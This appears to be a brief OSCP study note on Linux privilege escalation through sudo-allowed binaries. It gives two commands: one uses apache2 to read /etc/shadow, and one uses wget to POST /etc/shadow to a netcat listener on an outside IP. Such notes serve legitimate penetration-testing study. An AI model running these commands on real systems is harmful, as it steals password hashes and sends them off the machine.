// notes/ PrivEsc — Linux
🐧
Sudo Intended Functionality
After running sudo -l you come across apache2, however it isn't in gtfobins.
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/sudo_intended-functionality ↗Intended Functionality
Example
After running sudo -l you come across apache2, however it isn't in gtfobins.
Quick google search can lead you here.
Apache 2 has the ability to read files so you can abuse this by reading the shadow file
code
01sudo apache2 -f /etc/shadowAnother example could be with wget and sending yourself the shadow file with POST and a nc listener
code
01sudo wget --post-file=/etc/shadow 10.10.14.8:1337